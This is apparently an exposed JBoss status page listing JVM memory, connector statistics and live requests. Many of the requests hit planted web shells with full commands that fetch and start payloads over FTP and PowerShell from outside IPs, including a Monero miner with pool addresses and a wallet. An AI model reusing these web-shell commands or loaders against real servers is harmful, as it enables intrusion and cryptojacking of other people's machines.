JVM

Free memory: 125.67 MB Total memory: 201.18 MB Max memory: 493.06 MB

ajp-0.0.0.0-8009

Max threads: 40 Current thread count: 0 Current thread busy: 0
Max processing time: 0 ms Processing time: 0.0 s Request count: 0 Error count: 0 Bytes received: 0.00 MB Bytes sent: 0.00 MB

StageTimeB SentB RecvClientVHostRequest

P: Parse and prepare request S: Service F: Finishing R: Ready K: Keepalive

http-0.0.0.0-8080

Max threads: 250 Current thread count: 107 Current thread busy: 28
Max processing time: 3309259753 ms Processing time: 9.782572E7 s Request count: 1055800 Error count: 42456 Bytes received: 122.77 MB Bytes sent: 16290.78 MB

StageTimeB SentB RecvClientVHostRequest
R??????
R??????
R??????
S11208157751 ms0 KB0 KB60.1.206.4381.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
R??????
R??????
R??????
R??????
R??????
R??????
R??????
S11209119729 ms0 KB0 KB60.1.206.4381.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
S215083546 ms0 KB0 KB192.3.194.20281.45.140.46GET /jbossass/jbossass.jsp?ppp=cmd.exe+%2Fc+%40echo+open+194.38.20.31%3Epyuis.txt%26%40echo+binary%3E%3Epyuis.txt%26%40echo+get+%2Foracleservice.exe%3E%3Epyuis.txt%26%40echo+quit%3E%3Epyuis.txt%26%40ftp+-s%3Apyuis.txt+-v+-A%26%40start+oracleservice.exe HTTP/1.1
S535351531 ms0 KB0 KB192.3.194.20281.45.140.46GET /jbossass/jbossass.jsp?ppp=cmd.exe+%2Fc+%40echo+open+194.38.20.31%3Eoraclesu.txt%26%40echo+binary%3E%3Eoraclesu.txt%26%40echo+get+%2Fwxm.exe%3E%3Eoraclesu.txt%26%40echo+quit%3E%3Eoraclesu.txt%26%40ftp+-s%3Aoraclesu.txt+-v+-A%26%40start+wxm.exe+--donate-level%3D1+-k+-o+xmr.givemexyz.in%3A8080+-o+194.5.249.24%3A8080+-o+212.114.52.24%3A8080+-o+198.23.214.117%3A8080+-u+46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ+-p+x+-B HTTP/1.1
R??????
R??????
R??????
S1230509753 ms0 KB0 KB192.3.194.20281.45.140.46GET /jbossass/jbossass.jsp?ppp=cmd.exe+%2Fc+%40echo+open+209.141.40.190%3Epxx.txt%26%40echo+binary%3E%3Epxx.txt%26%40echo+get+%2Fwxm.exe%3E%3Epxx.txt%26%40echo+quit%3E%3Epxx.txt%26%40ftp+-s%3Apxx.txt+-v+-A%26%40start+wxm.exe+--donate-level%3D1+-k+-o+xmr.givemexyz.in%3A8080+-o+194.5.249.24%3A8080+-o+212.114.52.24%3A8080+-u+46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ+-p+x+-B HTTP/1.1
R??????
R??????
R??????
S10177794657 ms0 KB0 KB221.192.178.5881.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
R??????
R??????
R??????
R??????
R??????
S1652606653 ms0 KB0 KB192.3.194.20281.45.140.46GET /jbossass/jbossass.jsp?ppp=cmd.exe+%2Fc+%40echo+open+209.141.40.190%3Epxx.txt%26%40echo+binary%3E%3Epxx.txt%26%40echo+get+%2Fwxm.exe%3E%3Epxx.txt%26%40echo+quit%3E%3Epxx.txt%26%40ftp+-s%3Apxx.txt+-v+-A%26%40start+wxm.exe+--donate-level%3D1+-k+-o+xmr.givemexyz.in%3A8080+-o+194.5.249.24%3A8080+-o+212.114.52.24%3A8080+-u+46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ+-p+x+-B HTTP/1.1
S10178757568 ms0 KB0 KB221.192.178.5881.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
S510880670 ms0 KB0 KB192.3.194.20281.45.140.46GET /jbossass/jbossass.jsp?ppp=cmd.exe+%2Fc+%40echo+open+194.38.20.31%3Eoraclesu.txt%26%40echo+binary%3E%3Eoraclesu.txt%26%40echo+get+%2Fwxm.exe%3E%3Eoraclesu.txt%26%40echo+quit%3E%3Eoraclesu.txt%26%40ftp+-s%3Aoraclesu.txt+-v+-A%26%40start+wxm.exe+--donate-level%3D1+-k+-o+xmr.givemexyz.in%3A8080+-o+194.5.249.24%3A8080+-o+212.114.52.24%3A8080+-o+198.23.214.117%3A8080+-u+46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ+-p+x+-B HTTP/1.1
S3 ms0 KB0 KB3.236.51.151catalogo.museolazarogaldiano.esGET /status HTTP/1.1
R??????
R??????
R??????
S8085763659 ms0 KB0 KB221.192.3.23281.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
R??????
R??????
R??????
S483524470 ms0 KB0 KB192.3.194.20281.45.140.46GET /jbossass/jbossass.jsp?ppp=cmd.exe+%2Fc+%40echo+open+194.38.20.31%3Eoraclesu.txt%26%40echo+binary%3E%3Eoraclesu.txt%26%40echo+get+%2Fwxm.exe%3E%3Eoraclesu.txt%26%40echo+quit%3E%3Eoraclesu.txt%26%40ftp+-s%3Aoraclesu.txt+-v+-A%26%40start+wxm.exe+--donate-level%3D1+-k+-o+xmr.givemexyz.in%3A8080+-o+194.5.249.24%3A8080+-o+212.114.52.24%3A8080+-o+198.23.214.117%3A8080+-u+46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ+-p+x+-B HTTP/1.1
S1380228295 ms0 KB0 KB192.3.194.20281.45.140.46GET /jbossass/jbossass.jsp?ppp=cmd.exe+%2Fc+%40echo+open+209.141.40.190%3Epxx.txt%26%40echo+binary%3E%3Epxx.txt%26%40echo+get+%2Fwxm.exe%3E%3Epxx.txt%26%40echo+quit%3E%3Epxx.txt%26%40ftp+-s%3Apxx.txt+-v+-A%26%40start+wxm.exe+--donate-level%3D1+-k+-o+xmr.givemexyz.in%3A8080+-o+194.5.249.24%3A8080+-o+212.114.52.24%3A8080+-u+46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ+-p+x+-B HTTP/1.1
S273876179 ms0 KB0 KB192.3.194.20281.45.140.46GET /jbossass/jbossass.jsp?ppp=cmd.exe+%2Fc+%40echo+open+194.38.20.31%3Eoraclesu.txt%26%40echo+binary%3E%3Eoraclesu.txt%26%40echo+get+%2Fwxm.exe%3E%3Eoraclesu.txt%26%40echo+quit%3E%3Eoraclesu.txt%26%40ftp+-s%3Aoraclesu.txt+-v+-A%26%40start+wxm.exe+--donate-level%3D1+-k+-o+xmr.givemexyz.in%3A8080+-o+194.5.249.24%3A8080+-o+212.114.52.24%3A8080+-o+198.23.214.117%3A8080+-u+46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ+-p+x+-B HTTP/1.1
R??????
R??????
S217631990 ms0 KB0 KB192.3.194.20281.45.140.46GET /jbossass/jbossass.jsp?ppp=cmd.exe+%2Fc+%40echo+open+194.38.20.31%3Eoraclesu.txt%26%40echo+binary%3E%3Eoraclesu.txt%26%40echo+get+%2Fwxm.exe%3E%3Eoraclesu.txt%26%40echo+quit%3E%3Eoraclesu.txt%26%40ftp+-s%3Aoraclesu.txt+-v+-A%26%40start+wxm.exe+--donate-level%3D1+-k+-o+xmr.givemexyz.in%3A8080+-o+194.5.249.24%3A8080+-o+212.114.52.24%3A8080+-o+198.23.214.117%3A8080+-u+46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ+-p+x+-B HTTP/1.1
R??????
R??????
R??????
S5561736003 ms0 KB0 KB85.106.108.16481.45.140.46GET /jexws4/jexws4.jsp?ppp=powershell%20-Command%20%22%24wc%20%3D%20New-Object%20System.Net.WebClient%3B%20%24tempfile%20%3D%20%5BSystem.IO.Path%5D%3A%3AGetTempFileName%28%29%3B%20%24tempfile%20%2B%3D%20%27.bat%27%3B%20%24wc.DownloadFile%28%27http%3A%2F%2F190.144.115.54%3A443%2Fminer1.bat%27%2C%20%24tempfile%29%3B%20%26%20%24tempfile%2043a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFBWBnZXPbGtYjRE7pqc2s9dCQ5R2yk1V7SZkTWeBk6JiT2q5cXLa7T%3B%20Remove-Item%20-Force%20%24tempfile%22 HTTP/1.1
R??????
R??????
R??????
S1563733530 ms0 KB0 KB192.3.194.20281.45.140.46GET /jbossass/jbossass.jsp?ppp=cmd.exe+%2Fc+%40echo+open+209.141.40.190%3Epxx.txt%26%40echo+binary%3E%3Epxx.txt%26%40echo+get+%2Fwxm.exe%3E%3Epxx.txt%26%40echo+quit%3E%3Epxx.txt%26%40ftp+-s%3Apxx.txt+-v+-A%26%40start+wxm.exe+--donate-level%3D1+-k+-o+xmr.givemexyz.in%3A8080+-o+194.5.249.24%3A8080+-o+212.114.52.24%3A8080+-u+46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ+-p+x+-B HTTP/1.1
S1041416163 ms0 KB0 KB192.3.194.20281.45.140.46GET /jbossass/jbossass.jsp?ppp=powershell+iex%28New-Object+Net.WebClient%29.DownloadString%28%27http%3A%2F%2F209.141.59.139%2Fxms.ps1%27%29 HTTP/1.1
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
S1380806913 ms0 KB0 KB192.3.194.20281.45.140.46GET /jbossass/jbossass.jsp?ppp=cmd.exe+%2Fc+%40echo+open+209.141.40.190%3Epxx.txt%26%40echo+binary%3E%3Epxx.txt%26%40echo+get+%2Fwxm.exe%3E%3Epxx.txt%26%40echo+quit%3E%3Epxx.txt%26%40ftp+-s%3Apxx.txt+-v+-A%26%40start+wxm.exe+--donate-level%3D1+-k+-o+xmr.givemexyz.in%3A8080+-o+194.5.249.24%3A8080+-o+212.114.52.24%3A8080+-u+46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ+-p+x+-B HTTP/1.1
R??????
R??????
S8084802078 ms0 KB0 KB221.192.3.23281.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
S1208505919 ms0 KB0 KB192.3.194.20281.45.140.46GET /jbossass/jbossass.jsp?ppp=cmd.exe+%2Fc+%40echo+open+209.141.59.139%3Epxy.txt%26%40echo+binary%3E%3Epxy.txt%26%40echo+get+%2Fwxm.exe%3E%3Epxy.txt%26%40echo+quit%3E%3Epxy.txt%26%40ftp+-s%3Apxy.txt+-v+-A%26%40start+wxm.exe+--donate-level%3D1+-k+-o+xmr.givemexyz.in%3A8080+-o+194.5.249.24%3A8080+-o+212.114.52.24%3A8080+-u+46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ+-p+x+-B HTTP/1.1
R??????
R??????
S1715408216 ms0 KB0 KB192.3.194.20281.45.140.46GET /jbossass/jbossass.jsp?ppp=cmd.exe+%2Fc+%40echo+open+209.141.40.190%3Epxx.txt%26%40echo+binary%3E%3Epxx.txt%26%40echo+get+%2Fwxm.exe%3E%3Epxx.txt%26%40echo+quit%3E%3Epxx.txt%26%40ftp+-s%3Apxx.txt+-v+-A%26%40start+wxm.exe+--donate-level%3D1+-k+-o+xmr.givemexyz.in%3A8080+-o+194.5.249.24%3A8080+-o+212.114.52.24%3A8080+-u+46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ+-p+x+-B HTTP/1.1
S72285570 ms0 KB0 KB192.3.194.20281.45.140.46GET /jbossass/jbossass.jsp?ppp=cmd.exe+%2Fc+%40echo+open+194.38.20.31%3Epyuis.txt%26%40echo+binary%3E%3Epyuis.txt%26%40echo+get+%2Foracleservice.exe%3E%3Epyuis.txt%26%40echo+quit%3E%3Epyuis.txt%26%40ftp+-s%3Apyuis.txt+-v+-A%26%40start+oracleservice.exe HTTP/1.1
S5211915877 ms0 KB0 KB85.106.110.24381.45.140.46GET /jexinv4/jexinv4.jsp?ppp=powershell%20-Command%20%22%24wc%20%3D%20New-Object%20System.Net.WebClient%3B%20%24tempfile%20%3D%20%5BSystem.IO.Path%5D%3A%3AGetTempFileName%28%29%3B%20%24tempfile%20%2B%3D%20%27.bat%27%3B%20%24wc.DownloadFile%28%27http%3A%2F%2F190.144.115.54%3A443%2Fminer1.bat%27%2C%20%24tempfile%29%3B%20%26%20%24tempfile%2043a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFBWBnZXPbGtYjRE7pqc2s9dCQ5R2yk1V7SZkTWeBk6JiT2q5cXLa7T%3B%20Remove-Item%20-Force%20%24tempfile%22 HTTP/1.1
S483728860 ms0 KB0 KB192.3.194.20281.45.140.46GET /jbossass/jbossass.jsp?ppp=cmd.exe+%2Fc+%40echo+open+194.38.20.31%3Eoraclesu.txt%26%40echo+binary%3E%3Eoraclesu.txt%26%40echo+get+%2Fwxm.exe%3E%3Eoraclesu.txt%26%40echo+quit%3E%3Eoraclesu.txt%26%40ftp+-s%3Aoraclesu.txt+-v+-A%26%40start+wxm.exe+--donate-level%3D1+-k+-o+xmr.givemexyz.in%3A8080+-o+194.5.249.24%3A8080+-o+212.114.52.24%3A8080+-o+198.23.214.117%3A8080+-u+46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ+-p+x+-B HTTP/1.1
R??????
R??????
S1885182280 ms0 KB0 KB192.3.194.20281.45.140.46GET /jbossass/jbossass.jsp?ppp=cmd.exe+%2Fc+%40echo+open+209.141.40.190%3Epxx.txt%26%40echo+binary%3E%3Epxx.txt%26%40echo+get+%2Fwxm.exe%3E%3Epxx.txt%26%40echo+quit%3E%3Epxx.txt%26%40ftp+-s%3Apxx.txt+-v+-A%26%40start+wxm.exe+--donate-level%3D1+-k+-o+xmr.givemexyz.in%3A8080+-o+194.5.249.24%3A8080+-o+212.114.52.24%3A8080+-u+46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ+-p+x+-B HTTP/1.1
R??????
R??????
R??????
S5561727700 ms0 KB0 KB85.106.108.16481.45.140.46GET /jexinv4/jexinv4.jsp?ppp=powershell%20-Command%20%22%24wc%20%3D%20New-Object%20System.Net.WebClient%3B%20%24tempfile%20%3D%20%5BSystem.IO.Path%5D%3A%3AGetTempFileName%28%29%3B%20%24tempfile%20%2B%3D%20%27.bat%27%3B%20%24wc.DownloadFile%28%27http%3A%2F%2F190.144.115.54%3A443%2Fminer1.bat%27%2C%20%24tempfile%29%3B%20%26%20%24tempfile%2043a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFBWBnZXPbGtYjRE7pqc2s9dCQ5R2yk1V7SZkTWeBk6JiT2q5cXLa7T%3B%20Remove-Item%20-Force%20%24tempfile%22 HTTP/1.1
R??????
S2461917030 ms0 KB0 KB77.32.9.165catalogo.museolazarogaldiano.esGET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????

P: Parse and prepare request S: Service F: Finishing R: Ready K: Keepalive